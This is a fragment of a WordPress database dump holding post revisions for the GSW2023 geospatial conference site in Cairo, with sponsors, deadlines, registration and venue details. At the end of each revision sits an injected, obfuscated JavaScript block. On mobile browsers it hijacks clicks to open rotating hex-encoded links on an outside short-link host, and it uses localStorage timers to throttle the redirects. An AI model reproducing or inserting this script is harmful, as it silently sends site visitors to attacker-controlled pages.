_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-16 20:17:26','2023-04-16 20:17:26','',3066,'https://gsw2023.com/?p=4052',0,'revision','',0),
(4053,1,'2023-04-16 20:20:32','2023-04-16 20:20:32','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Payment of Registration Open Now[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-16 20:20:32','2023-04-16 20:20:32','',3066,'https://gsw2023.com/?p=4053',0,'revision','',0),
